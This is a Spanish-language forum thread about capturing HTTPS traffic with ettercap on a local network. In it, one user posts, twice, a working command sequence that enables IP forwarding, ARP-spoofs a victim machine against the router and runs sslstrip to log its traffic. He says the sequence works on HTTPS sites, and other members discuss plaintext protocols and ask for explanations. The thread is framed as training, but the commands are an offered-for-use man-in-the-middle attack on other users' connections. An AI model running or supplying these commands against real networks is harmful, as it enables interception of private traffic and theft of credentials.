LinkBack URL
About LinkBacks
CitarBueno encontre la solución:
Echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i wlan0 -t [IP VICTIMA] [IP ROUTER]
python sslstrip.py -w [nombre]
tail -f [nombre]
Saludos !! A dia de hoy funciona con sitios "https"
Ettercap a dia de hoy
Hola buenas, estoy snifeando en red local y haciendo test training.
Mi pregunta es: ¿ Cuando estoy snifeando con ettercap solo puedo obtener resultados cuando la pc-victima usa servidores "http" , en cambio cuando usa servidores "https" es imposible tener resultados...?
Alguna opinion ?
Gracias
Bueno encontre la solución:
Echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i wlan0 -t [IP VICTIMA] [IP ROUTER]
python sslstrip.py -w [nombre]
tail -f [nombre]
Saludos !! A dia de hoy funciona con sitios "https"
Hora rgcrally, a la hora de sniffar tienes que tener claro cuales son los protocolos vulnerables y que pasan datos en plaintext y cuales no. En el caso de HTTP, asi como FTP, TELNET entre otros, tienen este tipo de vuln. Ahora cuando trabajas con HTTPS o protocolo http basado en certificados, debes saber que es, para contrarestar estas medidas. Si los certificados no estan al dia, o realmente no estan instalados aunque la aplicacion corra HTTPS podras sniffarlo sin mas..o usar otra herramientas de tipo (sslstrip).
Saludos,
Última edición por Ksanchez; 08-21-2012 a las 10:42 AM
Hola a todos, soy nuevo en el foro, lo estuve recorriendo y leyendo post y me resultan muy interesantes
les comento que estoy empezando con esto de ettercap, y haciendo referencia a que solo puedo ver el contenido de http y al momento de hacer sniffing con https no logro que mande esa info,
rgcrally, esas lineas que pusiste van en la terminal?, podrias comentar que hace cada una de ellas? gracias!
una consulta mas, donde podria encontrar mas info de ettercap dentro del foro,
saludos a todos
Seria bueno poder profundizar en el tema de los certificados....
Permisos de publicación